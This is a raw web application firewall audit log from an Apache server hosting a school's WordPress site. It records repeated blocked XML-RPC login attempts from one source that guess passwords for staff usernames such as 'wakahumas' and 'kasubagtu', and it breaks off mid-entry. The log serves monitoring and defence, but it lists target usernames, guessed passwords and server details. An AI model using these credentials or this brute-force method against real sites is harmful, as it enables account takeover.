(http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4192fa78-Z-- --fabe2510-A-- [16/Apr/2025:11:16:55 +0700] Z_8vN0-sESiKFppgz04ZiQAAAMU 103.236.140.4 56304 103.236.140.4 8181 --fabe2510-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --fabe2510-C-- wp.getUsersBlogs wakahumas 2010 --fabe2510-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fabe2510-E-- --fabe2510-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (149+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777015375108 4121 (- - -) Stopwatch2: 1744777015375108 4121; combined=3178, p1=354, p2=2659, p3=0, p4=0, p5=97, sr=89, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fabe2510-Z-- --fdc08b77-A-- [16/Apr/2025:11:17:55 +0700] Z_8vc5VnVduWmh0dMDMUCwAAAII 103.236.140.4 56632 103.236.140.4 8181 --fdc08b77-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --fdc08b77-C-- wp.getUsersBlogs wakahumas qqqqq --fdc08b77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fdc08b77-E-- --fdc08b77-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (147+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777075088697 4197 (- - -) Stopwatch2: 1744777075088697 4197; combined=3219, p1=344, p2=2713, p3=0, p4=0, p5=94, sr=81, sw=68, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fdc08b77-Z-- --d1fc2e39-A-- [16/Apr/2025:11:18:15 +0700] Z_8vhxk9XPLR9cFiTEu-jgAAABI 103.236.140.4 56732 103.236.140.4 8181 --d1fc2e39-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d1fc2e39-C-- wp.getUsersBlogs wakahumas 1234%^&* --d1fc2e39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d1fc2e39-E-- --d1fc2e39-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777095173467 4381 (- - -) Stopwatch2: 1744777095173467 4381; combined=3330, p1=354, p2=2811, p3=0, p4=0, p5=98, sr=79, sw=67, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d1fc2e39-Z-- --af5fd814-A-- [16/Apr/2025:11:18:55 +0700] Z_8vrxk9XPLR9cFiTEu-6wAAAAk 103.236.140.4 56938 103.236.140.4 8181 --af5fd814-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --af5fd814-C-- wp.getUsersBlogs wakahumas superman --af5fd814-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af5fd814-E-- --af5fd814-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (146+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777135271789 3988 (- - -) Stopwatch2: 1744777135271789 3988; combined=3036, p1=351, p2=2519, p3=0, p4=0, p5=95, sr=80, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af5fd814-Z-- --cd6c6951-A-- [16/Apr/2025:11:19:55 +0700] Z_8v6ype92T0H9-Aa0y5kwAAAFM 103.236.140.4 57254 103.236.140.4 8181 --cd6c6951-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --cd6c6951-C-- wp.getUsersBlogs wakahumas 99999999 --cd6c6951-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd6c6951-E-- --cd6c6951-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (154+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777195220946 4236 (- - -) Stopwatch2: 1744777195220946 4236; combined=3276, p1=372, p2=2738, p3=0, p4=0, p5=97, sr=81, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd6c6951-Z-- --23c42a33-A-- [16/Apr/2025:11:20:55 +0700] Z_8wJype92T0H9-Aa0y5tAAAAEU 103.236.140.4 57562 103.236.140.4 8181 --23c42a33-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --23c42a33-C-- wp.getUsersBlogs wakahumas 1234567891 --23c42a33-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --23c42a33-E-- --23c42a33-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (153+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777255228205 4419 (- - -) Stopwatch2: 1744777255228205 4419; combined=3503, p1=384, p2=2837, p3=0, p4=0, p5=155, sr=82, sw=127, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --23c42a33-Z-- --93d99553-A-- [16/Apr/2025:11:21:55 +0700] Z_8wYxk9XPLR9cFiTEu_1AAAAAc 103.236.140.4 57902 103.236.140.4 8181 --93d99553-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 230 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --93d99553-C-- wp.getUsersBlogs wakasarpras Marketing2011 --93d99553-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93d99553-E-- --93d99553-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (156+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777315265269 4225 (- - -) Stopwatch2: 1744777315265269 4225; combined=3245, p1=352, p2=2724, p3=0, p4=0, p5=98, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93d99553-Z-- --d36b4751-A-- [16/Apr/2025:11:22:55 +0700] Z_8wnxk9XPLR9cFiTEvAKgAAABQ 103.236.140.4 58224 103.236.140.4 8181 --d36b4751-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d36b4751-C-- wp.getUsersBlogs wakasarpras Admin!@# --d36b4751-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d36b4751-E-- --d36b4751-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (155+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777375350298 4303 (- - -) Stopwatch2: 1744777375350298 4303; combined=3262, p1=359, p2=2724, p3=0, p4=0, p5=110, sr=82, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d36b4751-Z-- --9403941e-A-- [16/Apr/2025:11:23:55 +0700] Z_8w2xk9XPLR9cFiTEvAjgAAABY 103.236.140.4 58538 103.236.140.4 8181 --9403941e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --9403941e-C-- wp.getUsersBlogs wakasarpras customer --9403941e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9403941e-E-- --9403941e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (155+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777435263704 4618 (- - -) Stopwatch2: 1744777435263704 4618; combined=3509, p1=348, p2=2905, p3=0, p4=0, p5=147, sr=79, sw=109, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9403941e-Z-- --37e14a01-A-- [16/Apr/2025:11:24:51 +0700] Z_8xEype92T0H9-Aa0y6NQAAAEw 103.236.140.4 58810 103.236.140.4 8181 --37e14a01-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 225 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --37e14a01-C-- wp.getUsersBlogs wakasarpras 1234%^&* --37e14a01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37e14a01-E-- --37e14a01-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777491639233 5501 (- - -) Stopwatch2: 1744777491639233 5501; combined=3854, p1=455, p2=3219, p3=0, p4=0, p5=109, sr=90, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37e14a01-Z-- --c3e36413-A-- [16/Apr/2025:11:24:55 +0700] Z_8xF5VnVduWmh0dMDMUaAAAAJg 103.236.140.4 58884 103.236.140.4 8181 --c3e36413-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c3e36413-C-- wp.getUsersBlogs wakasarpras qazxsw --c3e36413-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c3e36413-E-- --c3e36413-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (145+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777495134879 4925 (- - -) Stopwatch2: 1744777495134879 4925; combined=3459, p1=326, p2=2947, p3=0, p4=0, p5=108, sr=68, sw=78, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c3e36413-Z-- --adfbd541-A-- [16/Apr/2025:11:25:55 +0700] Z_8xUxk9XPLR9cFiTEvB8QAAAAA 103.236.140.4 60858 103.236.140.4 8181 --adfbd541-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --adfbd541-C-- wp.getUsersBlogs wakasarpras junior --adfbd541-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --adfbd541-E-- --adfbd541-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (152+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777555097125 5317 (- - -) Stopwatch2: 1744777555097125 5317; combined=3858, p1=506, p2=3117, p3=0, p4=0, p5=138, sr=89, sw=97, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --adfbd541-Z-- --e181c733-A-- [16/Apr/2025:11:26:55 +0700] Z_8xj5VnVduWmh0dMDMVUQAAAIQ 103.236.140.4 34552 103.236.140.4 8181 --e181c733-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 226 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e181c733-C-- wp.getUsersBlogs wakasarpras tottenham --e181c733-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e181c733-E-- --e181c733-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (155+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777615097271 5299 (- - -) Stopwatch2: 1744777615097271 5299; combined=3786, p1=470, p2=3106, p3=0, p4=0, p5=121, sr=89, sw=89, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e181c733-Z-- --514e7a0e-A-- [16/Apr/2025:11:27:55 +0700] Z_8xyxk9XPLR9cFiTEvC6QAAAAI 103.236.140.4 36138 103.236.140.4 8181 --514e7a0e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 228 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --514e7a0e-C-- wp.getUsersBlogs kasubagtu kasubagtu2000 --514e7a0e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --514e7a0e-E-- --514e7a0e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (150+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777675105836 4734 (- - -) Stopwatch2: 1744777675105836 4734; combined=3743, p1=455, p2=3069, p3=0, p4=0, p5=124, sr=85, sw=95, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --514e7a0e-Z-- --6e296762-A-- [16/Apr/2025:11:28:55 +0700] Z_8yB0-sESiKFppgz04cNAAAANU 103.236.140.4 37762 103.236.140.4 8181 --6e296762-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 229 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6e296762-C-- wp.getUsersBlogs kasubagtu kasubagtu@1987 --6e296762-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6e296762-E-- --6e296762-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.90.195 (151+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1744777735355843 5203 (- - -) Stopwatch2: 1744777735355843 5203; combined=4033, p1=465, p2=3354, p3=0, p4=0, p5=122, sr=88, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6e296762-Z-- --99440e7e-A-- [16/Apr/2025:11:29:55 +0700] Z_8yQ0-sESiKFppgz04cbgAAANU 103.236.140.4 38298 103.236.140.4 8181 --99440e7e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.90.195 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.90.195 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --99440e7e-C-- wp.getUsersBlogs kasubagtu 888 --99440e7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --99440e7e-E-- --99440e7e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id 